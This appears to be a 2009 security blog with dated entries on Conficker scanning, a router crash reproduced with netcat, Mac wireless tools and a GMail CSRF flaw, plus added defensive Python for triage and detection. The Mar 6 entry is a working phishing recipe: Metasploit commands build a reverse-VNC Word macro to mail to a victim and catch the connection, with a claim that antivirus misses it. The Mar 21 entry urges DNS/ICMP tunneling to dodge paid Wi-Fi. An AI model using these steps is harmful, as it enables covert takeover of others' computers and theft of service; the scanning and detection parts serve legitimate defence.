Mar 31

Download the new version of Nmap.

Usage command:

nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [targetnetworks]
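Run over a whole network this produces a lot of output, and the practical way to triage it is to add -oX to the command and parse the XML report. The script below is an added example for this post, not code from the original or from the Nmap project: it reads an Nmap XML report and lists hosts whose smb-check-vulns result flags Conficker or a missing MS08-067 patch, plus hosts that returned no result at all (port closed or filtered, so they still need a credentialed check). The embedded report is constructed, and the status strings it matches ("Likely INFECTED", "VULNERABLE") follow the NSE script's "Key: STATUS" output lines as assumed here; check them against the Nmap version you run.

```python
import xml.etree.ElementTree as ET

# Constructed sample of an Nmap XML report (nmap ... -oX report.xml) for three
# hosts. The smb-check-vulns output text is modelled on the NSE script's
# "Key: STATUS" lines; verify the exact strings against your Nmap version.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: VULNERABLE&#10;  Conficker: Likely INFECTED&#10;  regsvc DoS: NOT VULNERABLE"/>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: NOT VULNERABLE&#10;  Conficker: Likely CLEAN&#10;  regsvc DoS: NOT VULNERABLE"/>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  </host>
</nmaprun>
"""


def parse_smb_check_vulns(xml_text):
    """Return {ip: {check_name: status}} for every host that produced a
    smb-check-vulns result. Each output line is split at the first colon."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != "smb-check-vulns":
                continue
            checks = {}
            for line in script.get("output", "").splitlines():
                line = line.strip()
                if ":" in line:
                    name, status = line.split(":", 1)
                    checks[name.strip()] = status.strip()
            results[addr.get("addr")] = checks
    return results


def flag_hosts(parsed):
    """Return (likely_infected, missing_ms08_067) as sorted IP lists."""
    infected = sorted(ip for ip, c in parsed.items()
                      if "INFECTED" in c.get("Conficker", "").upper())
    unpatched = sorted(ip for ip, c in parsed.items()
                       if c.get("MS08-067", "").upper() == "VULNERABLE")
    return infected, unpatched


def hosts_without_result(xml_text):
    """Hosts that were up but gave no smb-check-vulns result; these were not
    cleared by the scan and need a credentialed check instead."""
    root = ET.fromstring(xml_text)
    missing = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is not None and host.find("hostscript/script[@id='smb-check-vulns']") is None:
            missing.append(addr.get("addr"))
    return missing


if __name__ == "__main__":
    parsed = parse_smb_check_vulns(SAMPLE_NMAP_XML)
    infected, unpatched = flag_hosts(parsed)
    print("Likely Conficker-infected:", infected)
    print("Missing MS08-067 patch:   ", unpatched)
    print("No result (check manually):", hosts_without_result(SAMPLE_NMAP_XML))
```

Replace SAMPLE_NMAP_XML with the contents of your own -oX report file; the third category matters as much as the first two, since a host the scanner could not reach is not a clean host.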

Mar 31

Nessus plugin #36036 performs a network-based check for Windows computers infected with a variant of the Conficker virus. The scan does not need credentials, but it does require port 445 or 139 to be open between the Nessus scanner and your scanned systems. The plugin is based on research from the University of Bonn in Germany.

Conficker exploits Windows systems vulnerable to MS08-067. Tenable has worked with many organizations to help them perform both un-credentialed network scans and credentialed patch audits with Nessus to find systems that are still vulnerable. We wrote a blog about our typical experiences working with customers performing these scans.

Mar 30

Tillmann and Felix have their own proof-of-concept scanner that detects Conficker-infected hosts on the network. You can download the Python scanner here:

http://iv.cs.uni-bonn.de/uploads/media/scs.zip

Mar 24

After establishing a TCP connection to the affected device on port 53 from the LAN interface and then closing the connection, the router restarts.

Sometimes, when using the web trigger with Internet Explorer, the WAN configuration (IP, gateway IP, DNS servers) of the device was lost and a hardware reset was needed to make the device usable again.
This issue can be triggered from the LAN interface by a direct connection or by using specially crafted web content. For web content to trigger the issue, a browser without security restrictions on connections to port 53 must be used; in the tests done, Internet Explorer was the only one capable of activating the bug.

Steps to reproduce:

# direct connection
# nc -nvv 192.168.1.1 53

Mar 22

I was just thinking about Windows Wi-Fi snags and their audits; now I have got some info about the Mac Wi-Fi stuff, so I am letting you people know about it.
Viha is a project developing a suite of wireless auditing tools for Mac OS X. So far, the only components developed are a custom AirPort driver for monitor-mode packet capture, a framework for driver access and 802.11 packet deconstruction, and a command-line wireless network stumbler. Because OS X before 10.2 (Jaguar) doesn’t allow them to dynamically unload/load the Apple AirPort driver, they require OS X 10.2 for now.
They are GPL’ing everything for the newer releases, so the 0.0.1a release is binary-only, but the 0.0.2 releases will be under the GNU General Public License. To assist in using the driver in other projects, it will be available separately, while the “Tools” release includes everything else (including the driver).

The 0.0.1a release is a bugfix to correct a memory leak in IEEE80211Frame (thanks to Michael Rossberg (aziel@gmx.net) for reporting it; check out his awesome AQUA STUMBLER).
You can download Viha and get more info here.

Mar 21

One of the frustrating things while traveling is the obvious pay-for wireless at airports and hotels. If you check your mail at the airport and again at the hotel, the charges add up to a month of your personal broadband connection, not to mention that you have to give your credit card to an unknown access provider affiliate.

There are two traditional ways of getting around the captive portal: tunneling IP over DNS and tunneling IP over ICMP.

In most situations, the firewall will be set up to block or proxy all TCP traffic, and all HTTP requests are redirected to the authentication server that wants you to enter a credit card. DNS lookups and ICMP traffic (ping, for example) are quite often left untouched, however, allowing you to use these services to move data through a remote computer under your control.

The basic setup is the same for both scenarios, and you can use the same server as a DNS and ICMP proxy. All you’ll need is a public DNS server that you can manage and another server with a static IP that you can access remotely. Thomer Gil has written two excellent howtos, one for using NSTX (IP-over-DNS), and the other for using ICMPTX (IP-over-ICMP). Follow the guides, install and configure the two packages, and you can get free access in a pinch from just about anywhere.
NSTX (IP-over-DNS) HOWTO
ICMPTX (IP-over-ICMP) HOWTO
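From the network operator's side, the same property that makes these tunnels possible (DNS allowed out before authentication) is also what gives them away: many queries from one client to one zone, carrying long, high-entropy labels, often as TXT or NULL records rather than A lookups. The following is an added example for this post, not code from the original or from the NSTX/ICMPTX projects: a small heuristic run over a constructed DNS query log in a toy "timestamp client qtype qname" format. The zone split (last two labels) and the thresholds are assumptions to tune against your own resolver logs and baseline.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log in a toy "timestamp client qtype qname" format
# (not any particular resolver's native log). Client 10.0.0.5 browses normally;
# client 10.0.0.9 sends long hex labels under one zone as TXT/NULL queries.
SAMPLE_DNS_LOG = """\
2009-03-21T10:00:01 10.0.0.5 A www.example.com
2009-03-21T10:00:02 10.0.0.5 A mail.example.com
2009-03-21T10:00:03 10.0.0.5 AAAA www.example.com
2009-03-21T10:00:04 10.0.0.9 TXT 4f6b2a9c1d3e5f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a.tun.example.net
2009-03-21T10:00:04 10.0.0.9 TXT 9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9a8b.tun.example.net
2009-03-21T10:00:05 10.0.0.9 NULL 1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f.tun.example.net
2009-03-21T10:00:05 10.0.0.9 TXT 7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d.tun.example.net
2009-03-21T10:00:06 10.0.0.9 TXT 3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b.tun.example.net
2009-03-21T10:00:07 10.0.0.5 A cdn.example.org
"""

# Record types that carry arbitrary payload and are rare in normal client traffic.
BULK_QTYPES = {"TXT", "NULL", "CNAME"}


def shannon_entropy(text):
    """Bits per character; hex or base32 payload scores far above hostnames."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_zone(qname):
    """Toy split: zone = last two labels, subdomain = everything before them.
    Real deployments should use the public suffix list instead."""
    labels = qname.rstrip(".").split(".")
    if len(labels) <= 2:
        return "", qname
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def aggregate(log_text):
    """Per (client, zone): query count, summed subdomain length and entropy,
    and how many queries used a bulk-capable record type."""
    stats = defaultdict(lambda: {"count": 0, "sub_len": 0, "entropy": 0.0, "bulk": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than crash on them
        _ts, client, qtype, qname = parts
        sub, zone = split_zone(qname)
        s = stats[(client, zone)]
        s["count"] += 1
        s["sub_len"] += len(sub)
        s["entropy"] += shannon_entropy(sub)
        s["bulk"] += qtype.upper() in BULK_QTYPES
    return stats


def detect_tunnels(log_text, min_queries=3, min_mean_len=30, min_entropy=3.5):
    """Flag (client, zone) pairs whose subdomains are consistently long and
    either high-entropy or mostly bulk record types. Thresholds are assumed."""
    flagged = []
    for (client, zone), s in sorted(aggregate(log_text).items()):
        n = s["count"]
        mean_len = s["sub_len"] / n
        mean_ent = s["entropy"] / n
        bulk_frac = s["bulk"] / n
        if n >= min_queries and mean_len >= min_mean_len and (mean_ent >= min_entropy or bulk_frac >= 0.5):
            flagged.append({"client": client, "zone": zone, "queries": n,
                            "mean_subdomain_len": round(mean_len, 1),
                            "mean_entropy": round(mean_ent, 2),
                            "bulk_fraction": round(bulk_frac, 2)})
    return flagged


if __name__ == "__main__":
    for hit in detect_tunnels(SAMPLE_DNS_LOG):
        print(hit)
```

Volume alone is a poor signal (CDNs and mail servers also generate many lookups to one zone), which is why the check requires the length condition and one of the two payload-shaped conditions together; a tunnel that deliberately keeps labels short pays for it in throughput, which is the trade-off the operator is forcing.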

Have fun

Mar 17

Full Scope Security Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition from FullScopeSecurity on Vimeo.

Mar 6

Thanks to MatToufoutu for his guide; I just made a POC video.

Today I will show you how to use the Metasploit payload feature for a reverse VNC connection, which can be hidden in a Word file to get the VNC desktop of the remote user.

Metasploit will create a macro for Word; once a user opens the Word file containing the macro, we get a reverse VNC connection to the target system, and even antivirus can't detect it.

VNC does not need to be installed on the victim PC.
You can also do this over a WAN; the only thing is you should port-forward port 4444 on your modem or router.

Let's begin

1) Create a macro to integrate with Word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) Copy that punter.bas file to Windows. In Office 2003 go to Tools -> Macro -> Visual Basic Editor,
then File -> Import File, choose punter.bas, and save the document under a name, e.g. macrogame.doc.
Now send this file to the victim via mail or some other technique; for this demo I will open it on my own system.

3) Now in BackTrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on Windows opens the file, he/she will be asked whether or not to run the macro; if it is accepted, the connection will be initiated and the VNC client will open on the BackTrack host.

Video link for the above guide

http://blip.tv/file/1847504

WirelessPunter

Mar 5

Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.

GMail is vulnerable to CSRF attacks in the “Change Password” functionality. The only token used to authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.

An attacker can create a page that includes requests to the “Change Password” functionality of GMail and modify the passwords of authenticated users who visit the attacker's page.

The attack is made easier because the “Change Password” request can be performed with the HTTP GET method instead of the POST method normally used by the “Change Password” form. POC
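The two weaknesses named above (the session cookie is the only credential, and GET is accepted) are exactly what a synchronizer token and a method check close. The following is an added example for this post, not GMail's code or the original author's: a toy server-side handler in the vulnerable shape beside a hardened one. The hardened handler accepts POST only, requires a token derived from the session id with an HMAC under a server secret (so the browser sends the cookie automatically but a cross-site page cannot obtain the matching token), and additionally asks for the current password, an extra measure assumed here that the post does not mention. Session store, secret and status codes are all constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side state for the example: one server secret and an
# in-memory session store (session_id -> account record).
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {}


def new_session(user, password):
    """Log a user in and return the session id that would live in the cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "password": password}
    return sid


def csrf_token_for(session_id):
    """Derive the anti-CSRF token from the session id with an HMAC, so it is
    bound to the session but is never equal to the cookie value itself.
    The server embeds it in a hidden field of its own Change Password form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def vulnerable_change_password(method, cookie_sid, params):
    """The pattern described in the post: any request carrying a valid session
    cookie is honoured, GET or POST, with no per-request secret."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    session["password"] = params["new_password"]
    return 200, "password changed"


def hardened_change_password(method, cookie_sid, params):
    """State-changing requests are POST only, must carry the session-bound token
    in the body, and must prove knowledge of the current password."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    if method != "POST":
        return 405, "method not allowed"
    token = params.get("csrf_token", "")
    # Constant-time comparison; a wrong or missing token is rejected before
    # anything else is looked at.
    if not hmac.compare_digest(token, csrf_token_for(cookie_sid)):
        return 403, "bad csrf token"
    if params.get("current_password") != session["password"]:
        return 403, "current password mismatch"
    session["password"] = params["new_password"]
    return 200, "password changed"


def demo():
    """Replay the cross-site scenario against both handlers and return the
    status codes. A third-party page can make the browser attach the cookie,
    but it only controls the method and the parameters it puts in the request."""
    forged = {"new_password": "forged-value"}

    sid_a = new_session("victim-a", "old-secret")
    vuln_status, _ = vulnerable_change_password("GET", sid_a, forged)

    sid_b = new_session("victim-b", "old-secret")
    get_status, _ = hardened_change_password("GET", sid_b, forged)
    no_token_status, _ = hardened_change_password("POST", sid_b, forged)
    bad_token_status, _ = hardened_change_password(
        "POST", sid_b, dict(forged, csrf_token="0" * 64, current_password="old-secret"))

    # The legitimate form submission: the server's own form carried the token.
    legit = {"new_password": "user-chosen", "current_password": "old-secret",
             "csrf_token": csrf_token_for(sid_b)}
    legit_status, _ = hardened_change_password("POST", sid_b, legit)

    return {"vulnerable_get": vuln_status, "hardened_get": get_status,
            "hardened_post_no_token": no_token_status,
            "hardened_post_bad_token": bad_token_status,
            "hardened_legit_post": legit_status,
            "password_a": SESSIONS[sid_a]["password"],
            "password_b": SESSIONS[sid_b]["password"]}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

In a real application the token is rendered into a hidden field of the change-password form and read back from the POST body, never from a cookie or a URL parameter; the method check alone would not be enough, since a cross-site page can also submit a POST form, which is why the token carries the weight.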
